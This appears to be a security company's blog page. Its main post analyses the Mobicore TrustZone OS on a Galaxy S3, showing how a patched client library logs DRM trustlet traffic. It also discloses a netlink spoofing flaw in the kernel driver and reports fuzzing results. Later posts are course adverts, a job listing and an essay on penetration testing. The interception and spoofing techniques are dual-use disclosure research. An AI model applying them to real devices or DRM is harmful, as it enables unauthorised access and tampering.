Grey bar Blue bar
Share this:

Thu, 6 Jun 2013

A software level analysis of TrustZone OS and Trustlets in Samsung Galaxy Phone

Introduction:


New types of mobile applications based on Trusted Execution Environments (TEE) and most notably ARM TrustZone micro-kernels are emerging which require new types of security assessment tools and techniques. In this blog post we review an example TrustZone application on a Galaxy S3 phone and demonstrate how to capture communication between the Android application and TrustZone OS using an instrumented version of the Mobicore Android library. We also present a security issue in the Mobicore kernel driver that could allow unauthorised communication between low privileged Android processes and Mobicore enabled kernel drivers such as an IPSEC driver.


Mobicore OS :


The Samsung Galaxy S III was the first mobile phone that utilized ARM TrustZone feature to host and run a secure micro-kernel on the application processor. This kernel named Mobicore is isolated from the handset's Android operating system in the CPU design level. Mobicore is a micro-kernel developed by Giesecke & Devrient GmbH (G&D) which uses TrustZone security extension of ARM processors to create a secure program execution and data storage environment which sits next to the rich operating system (Android, Windows , iOS) of the Mobile phone or tablet. The following figure published by G&D demonstrates Mobicore's architecture :

Overview of Mobicore (courtesy of G&D)


A TrustZone enabled processor provides "Hardware level Isolation" of the above "Normal World" (NWd) and "Secure World" (SWd) , meaning that the "Secure World" OS (Mobicore) and programs running on top of it are immune against software attacks from the "Normal World" as well as wide range of hardware attacks on the chip. This forms a "trusted execution environment" (TEE) for security critical application such as digital wallets, electronic IDs, Digital Rights Management and etc. The non-critical part of those applications such as the user interface can run in the "Normal World" operating system while the critical code, private encryption keys and sensitive I/O operations such as "PIN code entry by user" are handled by the "Secure World". By doing so, the application and its sensitive data would be protected against unauthorized access even if the "Normal World" operating system was fully compromised by the attacker, as he wouldn't be able to gain access to the critical part of the application which is running in the secure world.

Mobicore API:


The security critical applications that run inside Mobicore OS are referred to as trustlets and are developed by third-parties such as banks and content providers. The trustlet software development kit includes library files to develop, test and deploy trustlets as well as Android applications that communicate with relevant trustlets via Mobicore API for Android. Trustlets need to be encrypted, digitally signed and then remotely provisioned by G&D on the target mobile phone(s). Mobicore API for Android consists of the following 3 components:


1) Mobicore client library located at /system/lib/libMcClient.so: This is the library file used by Android OS or Dalvik applications to establish communication sessions with trustlets on the secure world


2) Mobicore Daemon located at /system/bin/mcDriverDaemon: This service proxies Mobicore commands and responses between NWd and SWd via Mobicore device driver


3) Mobicore device driver: Registers /dev/mobicore device and performs ARM Secure Monitor Calls (SMC) to switch the context from NWd to SWd


The source code for the above components can be downloaded from Google Code. I enabled the verbose debug messages in the kernel driver and recompiled a Samsung S3 kernel image for the purpose of this analysis. Please note that you need to download the relevant kernel source tree and stock ROM for your S3 phone kernel build number which can be found in "Settings->About device". After compiling the new zImage file, you would need to insert it into a custom ROM and flash your phone. To build the custom ROM I used "Android ROM Kitchen 0.217" which has the option to unpack zImage from the stock ROM, replace it with the newly compiled zImage and pack it again.


By studying the source code of the user API library and observing debug messages from the kernel driver, I figured out the following data flow between the android OS and Mobicore to establish a session and communicate with a trustlet:


1) Android application calls mcOpenDevice() API which cause the Mobicore Daemon (/system/bin/mcDriverDaemon) to open a handle to /dev/mobicore misc device.


2) It then allocates a "Worlds share memory" (WSM) buffer by calling mcMallocWsm() that cause the Mobicore kernel driver to allocate wsm buffer with the requested size and map it to the user space application process. This shared memory buffer would later be used by the android application and trustlet to exchange commands and responses.


3) The mcOpenSession() is called with the UUID of the target trustlet (10 bytes value, for instance : ffffffff000000000003 for PlayReady DRM truslet) and allocate wsm address to establish a session with the target trustlet through the allocated shared memory.


4) Android applications have the option to attach additional memory buffers (up to 6 with maximum size of 1MB each) to the established session by calling mcMap() API. In case of PlayReady DRM trustlet which is used by the Samsung VideoHub application, two additional buffers are attached: one for sending and receiving the parameters and the other for receiving trustlet's text output.


5) The application copies the command and parameter types to the WSM along with the parameter values in second allocated buffer and then calls mcNotify() API to notify the Mobicore that a pending command is waiting in the WSM to be dispatched to the target trustlet.


6) The mcWaitNotification() API is called with the timeout value which blocks until a response received from the trustlet. If the response was not an error, the application can read trustlets' returned data, output text and parameter values from WSM and the two additional mapped buffers.


7) At the end of the session the application calls mcUnMap, mcFreeWsm and mcCloseSession .


The Mobicore kernel driver is the only component in the android operating system that interacts directly with Mobicore OS by use of ARM CPU's SMC instruction and Secure Interrupts . The interrupt number registered by Mobicore kernel driver in Samsung S3 phone is 47 that could be different for other phone or tablet boards. The Mobicore OS uses the same interrupt to notify the kernel driver in android OS when it writes back data.


Analysis of a Mobicore session:


There are currently 5 trustlets pre-loaded on the European S3 phones as listed below:


shell@android:/ # ls /data/app/mcRegistry


00060308060501020000000000000000.tlbin
02010000080300030000000000000000.tlbin
07010000000000000000000000000000.tlbin
ffffffff000000000000000000000003.tlbin
ffffffff000000000000000000000004.tlbin
ffffffff000000000000000000000005.tlbin


The 07010000000000000000000000000000.tlbin is the "Content Management" trustlet which is used by G&D to install/update other trustlets on the target phones. The 00060308060501020000000000000000.tlbin and ffffffff000000000000000000000003.tlbin are DRM related truslets developed by Discretix. I chose to analyze PlayReady DRM trustlet (ffffffff000000000000000000000003.tlbin), as it was used by the Samsung videohub application which is pre-loaded on the European S3 phones.


The videohub application dose not directly communicate with PlayReady trustlet. Instead, the Android DRM manager loads several DRM plugins including libdxdrmframeworkplugin.so which is dependent on libDxDrmServer.so library that makes Mobicore API calls. Both of these libraries are closed source and I had to perform dynamic analysis to monitor communication between libDxDrmServer.so and PlayReady trustlet. For this purpose, I could install API hooks in android DRM manager process (drmserver) and record the parameter values passed to Mobicore user library (/system/lib/libMcClient.so) by setting LD_PRELOAD environment variable in the init.rc script and flash my phone with the new ROM. I found this approach unnecessary, as the source code for Mobicore user library was available and I could add simple instrumentation code to it which saves API calls and related world shared memory buffers to a log file. In order to compile such modified Mobicore library, you would need to the place it under the Android source code tree on a 64 bit machine (Android 4.1.1 requires 64 bit machine to compile) with 30 GB disk space. To save you from this trouble, you can download a copy of my Mobicore user library from here. You need to create the empty log file at /data/local/tmp/log and replace this instrumented library with the original file (DO NOT FORGET TO BACKUP THE ORIGINAL FILE). If you reboot the phone, the Mobicore session between Android's DRM server and PlayReady trustlet will be logged into /data/local/tmp/log. A sample of such session log is shown below:



The content and address of the shared world memory and two additional mapped buffers are recorded in the above file. The command/response format in wsm buffer is very similar to APDU communication in smart card applications and this is not a surprise, as G&D has a long history in smart card technology. The next step is to interpret the command/response data, so that we can manipulate them later and observe the trustlet behavior. The trustlet's output in text format together with inspecting the assembly code of libDxDrmServer.so helped me to figure out the PlayReady trustlet command and response format as follows:


client command (wsm) : 08022000b420030000000001000000002500000028023000300000000500000000000000000000000000b0720000000000000000


client parameters (mapped buffer 1): 8f248d7e3f97ee551b9d3b0504ae535e45e99593efecd6175e15f7bdfd3f5012e603d6459066cc5c602cf3c9bf0f705b


trustlet response (wsm):08022000b420030000000081000000002500000028023000300000000500000000000000000000000000b0720000000000000000


trustltlet text output (mapped buffer 2):


==================================================


SRVXInvokeCommand command 1000000 hSession=320b4


SRVXInvokeCommand. command = 0x1000000 nParamTypes=0x25


SERVICE_DRM_BBX_SetKeyToOemContext - pPrdyServiceGlobalContext is 32074


SERVICE_DRM_BBX_SetKeyToOemContext cbKey=48


SERVICE_DRM_BBX_SetKeyToOemContext type=5


SERVICE_DRM_BBX_SetKeyToOemContext iExpectedSize match real size=48


SERVICE_DRM_BBX_SetKeyToOemContext preparing local buffer DxDecryptAsset start - iDatatLen=32, pszInData=0x4ddf4 pszIntegrity=0x4dde4


DxDecryptAsset calling Oem_Aes_SetKey DxDecryptAsset


calling DRM_Aes_CtrProcessData DxDecryptAsset


calling DRM_HMAC_CreateMAC iDatatLen=32 DxDecryptAsset


after calling DRM_HMAC_CreateMAC DxDecryptAsset


END SERVICE_DRM_BBX_SetKeyToOemContext


calling DRM_BBX_SetKeyToOemContext


SRVXInvokeCommand.id=0x1000000 res=0x0


==============================================


By mapping the information disclosed in the trustlet text output to the client command the following format was derived:


08022000 : virtual memory address of the text output buffer in the secure world (little endian format of 0x200208)


b4200300 : PlayReady session ID


00000001: Command ID (0x1000000)


00000000: Error code (0x0 = no error, is set by truslet after mcWaitNotification)


25000000: Parameter type (0x25)


28023000: virtual memory address of the parameters buffer in the secure world (little endian format of 0x300228)


30000000: Parameters length in bytes (0x30, encrypted key length)


05000000: encryption key type (0x5)


The trustlet receives client supplied memory addresses as input data which could be manipulated by an attacker. We'll test this attack later. The captured PlayReady session involved 18 command/response pairs that correspond to the following high level diagram of PlayReady DRM algorithm published by G&D. I couldn't find more detailed specification of the PlayReady DRM on the MSDN or other web sites. But at this stage, I was not interested in the implementation details of the PlayReady schema, as I didn't want to attack the DRM itself, but wanted to find any exploitable issue such as a buffer overflow or memory disclosure in the trustlet.

DRM Trustlet diagram (courtesy of G&D)


Security Tests:


I started by auditing the Mobicore daemon and kernel driver source code in order to find issues that can be exploited by an android application to attack other applications or result in code execution in the Android kernel space. I find one issue in the Mobicore kernel API which is designed to provide Mobicore services to other Android kernel components such as an IPSEC driver. The Mobicore driver registers Linux netLink server with id=17 which was intended to be called from the kernel space, however a Linux user space process can create a spoofed message using NETLINK sockets and send it to the Mobicore kernel driver netlink listener which as shown in the following figure did not check the PID of the calling process and as a result, any Android app could call Mobicore APIs with spoofed session IDs. The vulnerable code snippet from MobiCoreKernelApi/main.c is included below.



An attacker would need to know the "sequence number" of an already established netlink connection between a kernel component such as IPSEC and Mobicore driver in order to exploit this vulnerability. This sequence numbers were incremental starting from zero but currently there is no kernel component on the Samsung phone that uses the Mobicore API, thus this issue was not a high risk. We notified the vendor about this issue 6 months ago but haven't received any response regarding the planned fix. The following figures demonstrate exploitation of this issue from an Android unprivileged process :

Netlink message (seq=1) sent to Mobicore kernel driver from a low privileged process


Unauthorised netlink message being processed by the Mobicore kernel driver


In the next phase of my tests, I focused on fuzzing the PlayReady DRM trustlet that mentioned in the previous section by writing simple C programs which were linked with libMcClient.so and manipulating the DWORD values such as shared buffer virtual address. The following table summarises the results:
wsm offsetDescriptionResults
0Memory address of the mapped output buffer in trustlet process (original value=0x08022000)for values<0x8022000 the fuzzer crashed


values >0x8022000 no errors

41memory address of the parameter mapped buffer in trusltet process (original value=0x28023000)0x00001000<value<0x28023000 the fuzzer crashed


value>=00001000 trustlet exits with "parameter refers to secure memory area"


value>0x28023000 no errors

49Parameter length (encryption key or certificate file length)For large numbers the trustlet exits with "malloc() failed" message

The fuzzer crash indicated that Mobicore micro-kernel writes memory addresses in the normal world beyond the shared memory buffer which was not a critical security issue, because it means that fuzzer can only attack itself and not other processes. The "parameter refers to secure memory area" message suggests that there is some sort of input validation implemented in the Mobicore OS or DRM trustlet that prevents normal world's access to mapped addresses other than shared buffers. I haven't yet run fuzzing on the parameter values itself such as manipulating PlayReady XML data elements sent from the client to the trustlet. However, there might be vulnerabilities in the PlayReady implementation that can be picked up by smarter fuzzing.


Conclusion:


We demonstrated that intercepting and manipulating the worlds share memory (WSM) data can be used to gain better knowledge about the internal workings of Mobicore trustlets. We believe that this method can be combined with the side channel measurements to perform blackbox security assessment of the mobile TEE applications. The context switching and memory sharing between normal and secure world could be subjected to side channel attacks in specific cases and we are focusing our future research on this area.

Mon, 20 May 2013

Your first mobile assessment

Monday morning, raring for a week of pwnage and you see you've just been handed a new assessment, awesome. The problem? It's a mobile assessment and you've never done one before. What do you do, approach your team leader and ask for another assessment? He's going to tell you to learn how to do a mobile assessment and do it quickly, there are plenty more to come.


Now you set out on your journey into mobile assessments and you get lucky, the application that needs to be assessed is an Android app. A few Google searches later and you are feeling pretty confident about this, Android assessments are meant to be easy, there are even a few tools out there that "do it all". You download the latest and greatest version, run it and the app gets a clean bill of health. After all, the tool says so, there is no attack surface; no exposed intents and the permissions all check out. You compile your report, hand it off to the client and a week later the client gets owned through the application... Apparently the backend servers were accepting application input without performing any authentication checks. Furthermore, all user input was trusted and no server side validation was being performed. What went wrong? How did you miss these basic mistakes? After-all, you followed all the steps, you ran the best tools and you ticked all the boxes. Unfortunately this approach is wrong, mobile assessments are not always simply about running a tool, a lot of the time they require the same steps used to test web applications, just applied in a different manner. This is where SensePost's Hacking by numbers: Mobile comes to the fore, the course aims to introduce you to mobile training from the ground up.


The course offers hands-on training, introducing techniques for assessing applications on Android, IOS, RIM and Windows 8. Some of the areas covered include:



  • Communication protocols

  • Programming languages for mobile development

  • Building your own mobile penetration testing lab

  • Mobile application analysis

  • Static Analysis

  • Authentication and authorization

  • Data validation

  • Session management

  • Transport layer security and information disclosure



Unlike other mobile training or tutorials that focus on a specific platform or a specific tool on that platform, Hacking by Numbers aims to give you the knowledge to perform assessments on any platform with a well established methodology. Building on everything taught in the Hacking by Numbers series, the mobile course aims to move assessments into mobile sphere, continuing the strong tradition of pwnage. The labs are a direct result of the assessments we've done for clients. Our trainers do this on a weekly basis, so you get the knowledge learned from assessing numerous apps over the last few years.


On your next mobile assessment you'll be able to do both static and dynamic analysis of mobile applications. You will know where to find those credit card numbers stored on the phone and how to intercept traffic between the application and the backend servers.


The course: Hacking by numbers: Mobile

Mon, 4 Mar 2013

Black Hat Europe - Bootcamp Training

Bootcamp
SensePost will be at Black Hat Europe 2013 to deliver the Bootcamp module of the Hacking by Numbers series. This method based introductory course emphasizes the structure, approach, and thought-processes involved in hacking (over tools and tricks). The course is popular with beginners, who gain their first view into the world of hacking, as well as experts, who appreciate the sound, structured approach.


A break down of what will be covered during this course:


  • Internet Reconnaissance

  • Internet Fingerprinting

  • Vulnerability Discovery

  • Exploiting Known Vulnerabilities

  • Finding and Exploiting Vulnerabilities in Web Applications

  • Attacking Content Management Systems

  • SQL Injection

  • Real-world exercises and capture-the-flags


To summarize:


What? SensePost Hacking by Numbers, Bootcamp edition
Where? Amsterdam, BlackHat EU
When? 12th & 13th March 2013
Level? Introductory


See the BlackHat course page for more information, or to book your seat.


We're looking forward to seeing you there!
Glenn & Sara

Vulnerability Management Analyst Position


Have a keen interest on scanning over 12000 IP's a week for vulnerabilities? Excited about the thought of assessing over 100 web applications for common vulnerabilities? If so, an exciting, as well as demanding, position has become available within the Managed Vulnerability Scanning (MVS) team at SensePost.


Job Title: Vulnerability Management Analyst


Salary Range: Industry standard, commensurate with experience


Location: Johannesburg/Pretoria, South Africa


We are looking for a talented person to join our MVS team to help manage the technology that makes up our Broadview suite and, more importantly, finding vulnerabilities, interpreting the results and manually verifying them. We are after talented people with a broad skill set to join our growing team of consultants. Our BroadView suite of products consists of our extensive vulnerability scanning engine, which looks at both the network-layer and the application layer, as well as our extensive DNS footprinting technologies.


The role of the Vulnerability Management Analyst will possess the following skills:


  • Be able to multitask and meet client deadlines. We want a person that thinks 'I can do that!'

  • Possess excellent written and oral communication skills. Being able to understand a vulnerability and explain it to business leaders is a must.

  • A working knowledge of enterprise vulnerability management products and remedial work flow

  • A broad knowledge of most common enterprise technologies and operating systems

  • A passion for security and technology


Some additional conditions:

  • A post graduate degree or infosec certification would be beneficial, however, showing us you have the passion and skills also helps

  • This job requires some after-hours and weekend commitments (we try to keep this to a minimum)

  • Bonus points for knowledge of sed, awk and python, ok even ruby.

  • PCI-QSA is desired but not required


Impress us with your skills by sending an email to jobs@sensepost.com and lets take it from there.


SensePost is an equal opportunity partner.

Wed, 9 May 2012

Pentesting in the spotlight - a view

As 44Con 2012 starts to gain momentum (we'll be there again this time around) I was perusing some of the talks from last year's event...

It was a great event with some great presentations, including (if I may say) our own Ian deVilliers' *Security Application Proxy Pwnage*. Another presentation that caught my attention was Haroon Meer's *Penetration Testing considered harmful today*. In this presentation Haroon outlines concerns he has with Penetration Testing and suggests some changes that could be made to the way we test in order to improve the results we get. As you may know a core part of SensePost's business, and my career for almost 13 years, has been security testing, and so I followed this talk quite closely. The raises some interesting ideas and I felt I'd like to comment on some of the points he was making.

As I understood it, the talk's hypothesis could be (over) simplified as follows:

  1. Despite all efforts the security problem is growing and we're heading towards a 'security apocalypse';
  2. Penetration Testing has been presented as a solution to this problem;
  3. Penetration Testing doesn't seem to be working - we're still just one 0-day away from being owned - even for our most valuable assets;
  4. One of the reasons for this is that we don't cater for the 0-day, which is a game-changer. 0-day is sometimes overemphasized, but mostly it's underemphasized, making the value of the test spurious at best;
  5. There are some ways in which this can be improved, including the use '0-day cards', which allow the tester to emulate the use of a 0-day on a specific system without needing to actually have one. Think of this like a joker in a game of cards.
To begin with, let's consider the term "Penetration Testing", which sits at the core of the hypotheses. This term is widely used to express a number of security testing methodologies and could also be referred to as "attack & penetration", "ethical hacking", "vulnerability testing" or "vulnerability assessment". At SensePost we use the latter term, and the methodology it expresses includes a number of phases of which 'penetration testing' - the attempt to actually leverage the vulnerabilities discovered and practically demonstrate their potential impact to the business - is only one. The talk did not specify which specific definition of Penetration Test he was using. However, given the emphasis later in the talk about the significance of the 0-day and 'owning' things, I'm assuming he was using the most narrow, technical form of the term. It would seem to me that this already impacts much of his assertion: There are cases of course where a customer wants us simply to 'own' something, or somethings, but most often Penetration Testing is performed within the context of some broader assessment within which many of Haroon's concerns may already be being addressed. As the talk pointed out, there are instances where the question is asked "can we breached?", or "can we be breached without detecting it?". In such cases a raw "attack and penetration" test can be exactly what's needed; indeed it's a model that's been used by the military for decades. However for the most part penetration testing should only be used as a specific phase in an assessment and to achieve a specific purpose. I believe many services companies, including our own, have already evolved to the point where this is the case.

Next, I'd like to consider the assertion that penetration testing or even security assessment is presented as the "solution" to the security problem. While it's true that many companies do employ regular testing, amongst our customers it's most often used as a part of a broader strategy, to achieve a specific purpose. Security Assessment is about learning. Through regular testing, the tester, the assessment team and the customer incrementally understand threats and defenses better. Assumptions and assertions are tested and impacts are demonstrated. To me the talk's point is like saying that cholesterol testing is being presented as a solution to heart attacks. This seems untrue. Medical testing for a specific condition helps us gauge the likelihood of someone falling victim to a disease. Having understood this, we can apply treatments, change behavior or accept the odds and carry on. Where we have made changes, further testing helps us gauge whether those changes were successful or not. In the same way, security testing delivers a data point that can be used as part of a general security management process. I don't believe many people are presenting testing as the 'solution' to the security problem.

It is fair to say that the entire process within which security testing functions is not having the desired effect; Hence the talk's reference to a "security apocalypse". The failure of security testers to communicate the severity of the situation in language that business can understand surely plays a role here. However, it's not clear to me that the core of this problem lies with the testing component.

A significant, and interesting component of the talk's thesis has to do with the role of "0-day" in security and testing. He rightly points out that even a single 0-day in the hands of an attacker can completely change the result of the test and therefore the situation for the attacker. He suggests in his talk that the testing teams who do have 0-day are inclined to over-emphasise those that they have, whilst those who don't have tend to underemphasize or ignore their impact completely. Reading a bit into what he was saying, you can see the 0-day as a joker in a game of cards. You can play a great game with a great hand but if your opponent has a joker he's going to smoke you every time. In this the assertion is completely true. The talk goes on to suggest that testers should be granted "0-day cards", which they can "play" from time to time to be granted access to a particular system and thereby to illustrate more realistically the impact a 0-day can have. I like this idea very much and I'd like to investigate incorporating it into the penetration testing phase for some of our own assessments.

What I struggle to understand however, is why the talk emphasizes the particular 'joker' over a number of others that seems apparent to me. For example, why not have a "malicious system administrator card", a "spear phishing card", a "backdoor in OTS software" card or a "compromise of upstream provider" card? As the 'compromise' of major UK sites like the Register and the Daily Telegraph illustrate there are many factors that could significantly alter the result of an attack but that would typically fall outside the scope of a traditional penetration test. These are attack vectors that fall within the victim's threat model but are often outside of their reasonable control. Their existence is typically not dealt with during penetration testing, or even assessment, but also cannot be ignored. This doesn't doesn't invalidate penetration testing itself, it simply illustrates that testing is not equal to risk management and that risk management also needs to consider factors beyond the client's direct control.

The solution to this conundrum was touched on in the presentation, albeit very briefly, and it's "Threat Modeling". For the last five years I've been arguing that system- or enterprise-wide Threat Modeling presents us with the ability to deal with all these unknown factors (and more) and perform technical testing in a manner that's both broader and more efficient.

The core of the approach I'm proposing is roughly based on the Microsoft methodology and looks as follows:

  1. Develop a model of your target environment, incorporating all players, locations, and interfaces. This is done in close collaboration between the client and the tester, thus incorporating both the 'insider' and the 'outsider' perspective;
  2. Enumerate all potential risks, and map them to the model. This results in a very long and comprehensive list of hypothetical risks, which would naturally include the 0-day, but also all the other 'jokers' that we discussed above;
  3. Sort the list into some order of priority and group similar hypothetical risks together;
  4. Perform tests in order of priority where appropriate to prove or disprove the hypothetical risks;
  5. Remediate, mitigate, insure or inform as appropriate;
  6. Rinse and repeat.
This approach provides a reasonable balance between solid theoretical risk management and aggressive technical testing that addresses all the concerns raised in the talk about the way penetration testing is done today. It also provides the customer with a concrete register of tested risks that can easily be updated from time-to-time and makes sense to both technical and business leaders.

Threat Modeling makes our testing smarter, broader, more efficient and more relevant and as such is a vital improvement to our risk assessment methodology.

Solving the security problem in total is sadly still going to take a whole lot more work...